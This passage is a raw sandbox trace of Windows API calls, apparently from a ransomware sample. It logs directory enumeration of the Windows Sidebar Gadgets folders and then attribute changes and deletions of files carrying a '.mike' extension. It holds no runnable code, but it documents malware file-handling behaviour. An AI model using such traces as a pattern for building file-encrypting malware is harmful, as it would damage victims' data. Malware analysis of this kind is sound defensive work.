ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.425] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll.mui", cAlternateFileName="")) returned 1 [0102.426] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sidebar.exe.mui", cAlternateFileName="")) returned 1 [0102.426] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sidebar.exe.mui", cAlternateFileName="")) returned 0 [0102.426] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.426] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.426] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.426] CoTaskMemFree (pv=0x506980) [0102.426] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xa1afe884, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.429] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xa1afe884, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.430] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Calendar.Gadget", cAlternateFileName="CALEND~1.GAD")) returned 1 [0102.430] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Clock.Gadget", cAlternateFileName="CLOCK~1.GAD")) returned 1 [0102.431] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CPU.Gadget", cAlternateFileName="CPU~1.GAD")) returned 1 [0102.431] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Currency.Gadget", cAlternateFileName="CURREN~1.GAD")) returned 1 [0102.431] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1afe884, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8df54c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MediaCenter.Gadget", cAlternateFileName="MEDIAC~1.GAD")) returned 1 [0102.431] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PicturePuzzle.Gadget", cAlternateFileName="PICTUR~1.GAD")) returned 1 [0102.431] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSSFeeds.Gadget", cAlternateFileName="RSSFEE~1.GAD")) returned 1 [0102.432] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SlideShow.Gadget", cAlternateFileName="SLIDES~1.GAD")) returned 1 [0102.432] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 1 [0102.432] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 0 [0102.432] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.433] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xa1afe884, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.434] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xa1afe884, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.434] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Calendar.Gadget", cAlternateFileName="CALEND~1.GAD")) returned 1 [0102.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Clock.Gadget", cAlternateFileName="CLOCK~1.GAD")) returned 1 [0102.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CPU.Gadget", cAlternateFileName="CPU~1.GAD")) returned 1 [0102.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Currency.Gadget", cAlternateFileName="CURREN~1.GAD")) returned 1 [0102.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1afe884, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8df54c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MediaCenter.Gadget", cAlternateFileName="MEDIAC~1.GAD")) returned 1 [0102.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PicturePuzzle.Gadget", cAlternateFileName="PICTUR~1.GAD")) returned 1 [0102.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSSFeeds.Gadget", cAlternateFileName="RSSFEE~1.GAD")) returned 1 [0102.436] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SlideShow.Gadget", cAlternateFileName="SLIDES~1.GAD")) returned 1 [0102.436] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 1 [0102.436] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.436] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.437] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.437] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.437] CoTaskMemFree (pv=0x506980) [0102.437] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.438] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.439] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x27ed4187, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1a74, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0102.439] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.439] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28135767, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x28135767, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x28135767, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd13, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0102.439] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805ee1db, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805ee1db, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0102.439] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842b7a8e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842b7a8e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x284ed995, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0102.439] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.440] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.442] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0102.450] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0102.451] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\drag.png.mike")) returned 1 [0102.454] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0102.460] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0102.461] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\icon.png.mike")) returned 1 [0102.467] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0102.471] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0102.473] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\logo.png.mike")) returned 1 [0102.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65ea040, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x65ea040, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x27ed4187, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1a74, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0102.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28135767, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x28135767, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x28135767, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd13, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0102.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805ee1db, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805ee1db, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0102.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842b7a8e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842b7a8e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x284ed995, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0102.474] FindNextFileW (in: 